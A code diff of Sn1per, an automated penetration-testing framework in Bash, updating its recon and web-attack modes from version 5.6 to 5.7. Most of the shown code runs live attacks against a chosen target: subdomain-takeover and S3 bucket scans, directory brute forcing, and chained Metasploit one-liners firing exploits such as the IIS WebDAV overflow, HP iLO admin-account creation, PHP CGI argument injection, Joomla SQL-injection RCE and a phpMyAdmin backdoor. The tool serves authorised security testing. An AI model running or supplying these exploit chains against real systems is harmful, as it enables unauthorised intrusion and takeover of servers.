echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
fi
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/dns-$TARGET-email.txt 2>/dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
aquatone-discover -d $TARGET -t 100 --wordlist $PLUGINS_DIR/Sublist3r/subdomains.lst | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2>/dev/null
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2>/dev/null
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2>/dev/null
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
if [ "$SUBOVER" = "1" ]; then
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd $PLUGINS_DIR/slurp/
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
source modes/osint.sh
source modes/recon.sh
cd $INSTALL_DIR
echo ""
fi
@ -220,7 +137,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
@ -228,13 +145,13 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 1
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_QUICK -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
@ -277,7 +194,7 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
@ -285,13 +202,13 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 1
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_QUICK -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null

View File

@ -117,7 +117,7 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET -l 3 -s y 2> /dev/null
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -155,39 +155,47 @@ if [ "$MODE" = "webporthttp" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT
clusterd -i $TARGET -p $PORT 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"

View File

@ -127,7 +127,7 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET -l 3 -s y 2> /dev/null
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -140,7 +140,7 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET -p $PORT
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -162,41 +162,49 @@ if [ "$MODE" = "webporthttps" ]; then
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"

104
sniper
View File

@ -1,57 +1,19 @@
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://xerosecurity.com
#
# + -- --=[Sn1per by @xer0dayz
# + -- --=[https://xerosecurity.com
#
VER="5.6"
BROWSER="firefox" # SET DEFAULT BROWSER
VER="5.7"
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="$INSTALL_DIR/plugins"
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-full-sorted.txt"
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-insane-sorted.txt"
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-all.txt"
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
# DEFAULT SETTINGS
AUTOBRUTE="0"
FULLNMAPSCAN="0"
OSINT="0"
ENABLE_AUTO_UPDATES="1"
REPORT="1"
LOOT="1"
# PLUGINS
SUBLIST3R="1"
AMASS="1"
SUBFINDER="1"
DNSCAN="0"
CRTSH="1"
SUBOVER="1"
CLOUDHUNTER="0"
SSL="1"
PASSIVE_SPIDER="1"
BLACKWIDOW="1"
METASPLOIT_IMPORT="0"
# LOAD SNIPER CONFIGURATION FILE
if [ -f ~/.sniper.conf ]; then
source ~/.sniper.conf
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
else
source $INSTALL_DIR/sniper.conf
echo -e "$OKBLUE[*] Loaded configuration file from $INSTALL_DIR/sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
fi
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
@ -65,8 +27,8 @@ function help {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
echo ""
echo ' [*] NORMAL MODE'
echo ' sniper -t|--target <TARGET>'
@ -134,8 +96,8 @@ function logo {
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo ""
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
